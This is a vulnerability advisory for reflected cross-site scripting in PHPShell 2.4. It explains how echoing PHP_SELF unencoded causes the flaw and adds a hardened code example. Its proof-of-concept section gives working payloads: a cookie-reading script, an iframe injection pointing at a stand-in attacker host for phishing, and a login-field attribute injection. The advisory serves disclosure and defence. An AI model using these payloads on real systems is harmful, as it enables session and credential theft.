geeko

PHPShell 2.4 Cross Site Scripting

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt
[+] ISR: ApparitionSec



Vendor:
==========
sourceforge.net/projects/phpshell/
phpshell.sourceforge.net/



Product:
=============
PHPShell v2.4


Vulnerability Type:
====================
Cross Site Scripting



CVE Reference:
==============
N/A



Security Issue:
================
Multiple cross site scripting entry points exist in PHPShell, undermining
the integrity between the user's browser and the server and allowing remote
attackers to bypass access controls such as the same-origin policy if an
authenticated user clicks an attacker-supplied link.

The XSS issue is made possible because PHPShell prints $_SERVER['PHP_SELF']
into the main HTML form. Since PHP_SELF reflects the requested URL (including
anything appended after the script name), PHPShell simply reads the XSS
payload from the URL and echoes it back to the client unencoded.

<form name="shell" enctype="multipart/form-data" action="<?php print($_SERVER['PHP_SELF']) ?>" method="post">

Since PHPShell's purpose is to execute system commands, this XSS vulnerability
can potentially be escalated into remote command execution. Moreover, this
XSS issue can also be chained with a Session Fixation vulnerability also
present in PHPShell.
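As an added illustration (not PHPShell's own code), the form-action pattern quoted above is placed beside a hardened version; the $server array is a constructed stand-in for $_SERVER built from the advisory's first PoC request.

```php
<?php
// Added example, not from PHPShell. Shows why echoing PHP_SELF into an
// HTML attribute is dangerous and how to render the same attribute safely.

// Vulnerable pattern (as in the advisory): PHP_SELF carries any extra path
// segments from the request URL, so a request for
// /phpshell.php/"><script>... lands verbatim inside the attribute.
function vulnerable_action(array $server): string
{
    return '<form name="shell" action="' . $server['PHP_SELF'] . '" method="post">';
}

// Hardened pattern: use SCRIPT_NAME (the script path without trailing path
// info) and HTML-encode it so quotes and angle brackets cannot terminate
// the attribute or open a tag. The encoding is the essential part.
function hardened_action(array $server): string
{
    $self = htmlspecialchars($server['SCRIPT_NAME'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form name="shell" action="' . $self . '" method="post">';
}

// Constructed request mirroring the advisory's first PoC URL (decoded).
$server = [
    'SCRIPT_NAME' => '/phpshell-2.4/phpshell.php',
    'PHP_SELF'    => '/phpshell-2.4/phpshell.php/"/><script>alert(document.cookie)</script>',
];

// The first line breaks out of the attribute and injects a script tag;
// the second keeps the payload out of the markup entirely.
echo vulnerable_action($server), PHP_EOL;
echo hardened_action($server), PHP_EOL;
```

The same htmlspecialchars() treatment applies to the login form's reflected 'username' value described under XSS 2, since that field is likewise echoed back inside an attribute.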


Reference:
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt


Tested successfully in Firefox.


Exploit/POC:
=============

XSS 1)

http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

OR Inject IFRAME to phish and steal credentials, you get the idea.

http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!--



XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php

On the Login Authentication HTML form, enter the following in the 'username' input field:

" onMousemove="alert(document.cookie)

then enter a password and hit Enter.




Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
===============================
Vendor Notification: No reply
In addition, the INSTALL file's "Bugs?  Comments?" Tracker System link returns
HTTP 404:
http://sourceforge.net/tracker/?group_id=156638
February 18, 2017 : Public Disclosure
